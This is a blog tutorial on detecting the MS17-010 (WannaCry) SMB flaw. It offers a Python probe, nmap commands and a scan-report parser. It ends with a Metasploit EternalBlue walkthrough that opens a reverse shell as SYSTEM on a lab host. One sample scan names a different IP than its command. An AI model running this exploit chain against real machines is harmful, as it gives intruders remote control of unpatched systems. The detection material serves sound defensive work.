After the media whirlwind of the last few days, a lot of people who don't work in IT or don't know much about it are asking: "mate, how do I find out whether I can catch that ransomware?", and the quick answer is usually "update Windows right now, if you haven't already". The reason is obvious: the network vector the WannaCry ransomware uses is the SMBv1 vulnerability fixed by bulletin MS17-010 on 14 March 2017, the same one exploited by the infamous ETERNALBLUE released by the Shadow Brokers.

We could also stop the malware from spreading by disabling SMBv1, or trust to Saint Custodio that a "kill switch" recognising the variant stalking us has been triggered, but... why take the risk? Update, update, UPDATE!

Now, if you are on a network and are not directly responsible for patching the Microsoft machines on the LAN, you may have been asked, or may simply find it interesting }:-), to find out which machines have 445/TCP reachable and are vulnerable. For that we could use the Metasploit scanner (auxiliary/scanner/smb/smb_ms17_010), although it is somewhat slower than the nmap script we will use first, which Paulino Calderon from Mexico (leader of the @OWASP_riviera chapter) published last Sunday.

What the script does is open an anonymous session to the IPC$ share, issue a transaction (PeekNamedPipe) on FID 0 and check whether the error "STATUS_INSUFF_SERVER_RESOURCES" comes back, which tells it the host has not been patched against MS17-010; a patched host answers with STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE instead. If the null session or the tree connect to IPC$ fails, the script cannot run the check at all and reports that rather than a verdict.

https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
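The probe the script performs, as an added stand-alone example (my code, not Calderon's script nor any nmap library): it opens an anonymous SMB1 session, tree-connects to IPC$, sends the SMB_COM_TRANSACTION with PeekNamedPipe on FID 0 and classifies the NT status of the reply. The packet layouts follow MS-CIFS; the constant and function names, the verdict strings and the embedded sample reply are my own, and that sample reply is constructed, not captured from a host.

```python
"""MS17-010 probe with the same logic as smb-vuln-ms17-010.nse: anonymous SMB1
session -> tree connect to IPC$ -> SMB_COM_TRANSACTION (PeekNamedPipe, FID 0)
-> classify the NT status of the reply. Packet layouts follow MS-CIFS."""
import socket
import struct

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched host answers this
STATUS_ACCESS_DENIED = 0xC0000022             # patched host (usual reply)
STATUS_INVALID_HANDLE = 0xC0000008            # patched host (also seen)
SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75

def smb_header(command, tid=0, uid=0):
    """32-byte SMB1 header. flags 0x18: canonical, case-insensitive paths;
    flags2 0x4001: NT status codes + long names (no Unicode, no extended security)."""
    return (b"\xffSMB" + struct.pack("<BIBHH", command, 0, 0x18, 0x4001, 0)
            + b"\x00" * 8 + struct.pack("<HHHHH", 0, tid, 0xFEFF, uid, 1))

def nbss(smb):
    """NetBIOS session service framing: type 0 plus a 24-bit big-endian length."""
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb

def negotiate_req():
    dialects = b"\x02NT LM 0.12\x00"          # WordCount 0, then ByteCount + dialect list
    return nbss(smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects)

def session_setup_req():
    """Null session: zero-length OEM/Unicode passwords, empty account and domain.
    Words: AndX(0xFF,0,0) MaxBuf MaxMpx Vc SessionKey OEMLen UniLen Reserved Caps."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 0, 0, 0, 0, 0, 0x50)
    data = b"\x00\x00\x00\x00"               # AccountName, PrimaryDomain, NativeOS, NativeLanMan
    return nbss(smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words + struct.pack("<H", len(data)) + data)

def tree_connect_req(host, uid):
    data = b"\x00" + b"\\\\" + host.encode() + b"\\IPC$\x00" + b"?????\x00"  # password, path, service
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)                            # AndX, Flags, PasswordLength
    return nbss(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data)

def peek_named_pipe_req(tid, uid):
    """SMB_COM_TRANSACTION with Setup = [0x23 PeekNamedPipe, FID 0]: the probe itself.
    Parameter/data offset 0x4A = 32 header + 1 + 32 words + 2 + 7 bytes of name."""
    name = b"\\PIPE\\\x00"
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, 0x4A, 0, 0x4A, 2, 0, 0x23, 0)
    return nbss(smb_header(SMB_COM_TRANSACTION, tid, uid) + b"\x10" + words + struct.pack("<H", len(name)) + name)

def nt_status(smb):
    """NT status sits at bytes 5..8 of the SMB header (little-endian)."""
    return struct.unpack_from("<I", smb, 5)[0]

def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "NOT VULNERABLE"
    return "INCONCLUSIVE (status 0x%08X)" % status

def recv_smb(sock):
    """Read one NetBIOS-framed message; b'' if the peer closed the connection."""
    def exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                return b""
            buf += chunk
        return buf
    hdr = exact(4)
    return exact(struct.unpack(">I", b"\x00" + hdr[1:])[0]) if hdr else b""

def check(host, port=445, timeout=5):
    """Run the probe against one host and return a verdict string."""
    with socket.create_connection((host, port), timeout) as s:
        s.sendall(negotiate_req())
        if len(recv_smb(s)) < 32:
            return "INCONCLUSIVE (no SMB1 negotiate reply; SMBv1 disabled?)"
        s.sendall(session_setup_req())
        r = recv_smb(s)
        if len(r) < 32 or nt_status(r) != 0:
            return "Could not connect to 'IPC$' (null session refused)"
        uid = struct.unpack_from("<H", r, 28)[0]          # UID lives at header offset 28
        s.sendall(tree_connect_req(host, uid))
        r = recv_smb(s)
        if len(r) < 32 or nt_status(r) != 0:
            return "Could not connect to 'IPC$' (tree connect failed)"
        tid = struct.unpack_from("<H", r, 24)[0]          # TID lives at header offset 24
        s.sendall(peek_named_pipe_req(tid, uid))
        r = recv_smb(s)
        return classify(nt_status(r)) if len(r) >= 32 else "INCONCLUSIVE (no reply)"

# Constructed sample reply (not a capture): transaction response from an unpatched host.
SAMPLE_VULN_REPLY = b"\xffSMB" + struct.pack("<BI", SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES) + b"\x00" * 23
```

Run it as `python3 -c 'import ms17probe; print(ms17probe.check("192.168.1.23"))'` (module name assumed) against a host you are allowed to test. Like the NSE script, it only reports VULNERABLE on the one status code an unpatched server returns, and it keeps the "Could not connect to 'IPC$'" case separate from a patched host, because a refused null session says nothing about the patch level.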

All we have to do is download the .nse script into the corresponding directory, by default:

# Linux – /usr/share/nmap/scripts/ or /usr/local/share/nmap/scripts/
# OSX – /opt/local/share/nmap/scripts/
# Windows – c:\Program Files\Nmap\Scripts

And run:

nmap -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse X.X.X.X/X

NOT VULNERABLE example (note that "Could not connect to 'IPC$'" means the script could not open an anonymous session to the IPC$ share, so it never ran the check; treat that host as unverified rather than as patched):

nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.22

Starting Nmap 7.12 ( https://nmap.org ) at 2017-05-16 1:56 CEST
Nmap scan report for 192.168.1.66
Host is up (0.00049s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 50:7B:9D:D5:05:CA (Lcfc(hefei) Electronics Technology)

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'

VULNERABLE example:

# nmap -Pn -sC -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010.nse 192.168.1.23

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-16 2:02 EDT
Nmap scan report for 192.168.1.23
Host is up (0.00069s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|       
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
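To turn a subnet scan into a host list, as an added example that is not part of the original post: save the scan with `-oN ms17-010.txt` and feed the file to this parser, which sorts each host into VULNERABLE, INCONCLUSIVE (the script could not reach IPC$) or NOT VULNERABLE (445 open, script reported nothing). The report embedded below is constructed from the two outputs shown above merged into one file, plus a third host, 192.168.1.40, that I made up to show the silent case; the function names are my own.

```python
"""Triage the -oN output of an smb-vuln-ms17-010 subnet scan into per-host verdicts."""
import re
import sys

# "Nmap scan report for 192.168.1.23" or "Nmap scan report for host (192.168.1.23)"
HOST_RE = re.compile(r"Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?")

def triage(report):
    """Map each scanned IP to a verdict, reading the report line by line."""
    verdicts, host = {}, None
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            verdicts[host] = "445/tcp NOT OPEN (script did not run)"
        elif host is None:
            continue
        elif line.startswith("445/tcp") and " open " in line:
            # Port open and, unless a later line says otherwise, the script found nothing
            verdicts[host] = "NOT VULNERABLE (script reported no finding)"
        elif "Could not connect to 'IPC$'" in line:
            # No null session to IPC$: the check never ran, so no verdict either way
            verdicts[host] = "INCONCLUSIVE (IPC$ unreachable anonymously)"
        elif "State: VULNERABLE" in line:
            verdicts[host] = "VULNERABLE"
    return verdicts

def vulnerable_hosts(report):
    """Sorted list of IPs the script flagged as vulnerable."""
    return sorted(h for h, v in triage(report).items() if v == "VULNERABLE")

# Constructed report (not a real scan): the two outputs above merged into one file,
# plus a third host on which the script printed nothing.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.1.66
Host is up (0.00049s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'

Nmap scan report for 192.168.1.23
Host is up (0.00069s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143

Nmap scan report for 192.168.1.40
Host is up (0.00051s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 3 IP addresses (3 hosts up) scanned in 1.20 seconds
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    for ip, verdict in sorted(triage(text).items()):
        print(ip, verdict)
```

The INCONCLUSIVE bucket is the one to chase with credentials or with the patch inventory: those hosts refused the null session, which is good hygiene, but it leaves their MS17-010 status unknown.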


And as you know, if the machine is vulnerable, getting a shell at this point is trivial. Bear in mind that EternalBlue corrupts the kernel's non-paged pool, so a failed attempt can bluescreen the target: only run it against machines you are authorised to test. The module retries up to MaxExploitAttempts times, adding GroomDelta allocations each time, which is why the successful attempt below uses 17 groom allocations after the first one with 12 failed.

We rescan with the Metasploit module just in case.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.23
RHOSTS => 192.168.1.23
msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.23:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Professional 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We use the exploit https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb, which Metasploit loads as exploit/windows/smb/ms17_010_eternalblue:

msf > use windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.23
RHOST => 192.168.1.23
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > set ProcessName lsass.exe
ProcessName => lsass.exe
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[-] 192.168.1.23:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.23:445).
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.114:4444 
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.23:445 - Connecting to target for exploitation.
[+] 192.168.1.23:445 - Connection established for exploitation.
[*] 192.168.1.23:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.23:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.23:445 - Starting non-paged pool grooming
[+] 192.168.1.23:445 - Sending SMBv2 buffers
[+] 192.168.1.23:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.23:445 - Sending final SMBv2 buffers.
[*] 192.168.1.23:445 - Sending last fragment of exploit packet!
[*] 192.168.1.23:445 - Receiving response from exploit packet
[+] 192.168.1.23:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.23:445 - Sending egg to corrupted connection.
[*] 192.168.1.23:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.114:4444 -> 192.168.1.23:1096) at 2017-05-16 11:12:20 -0400
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.23:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\windows\system32>whoami
whoami
nt authority\system

C:\windows\system32>hostname
hostname
WINDOWS-PC1
Seen at: Hackplayers
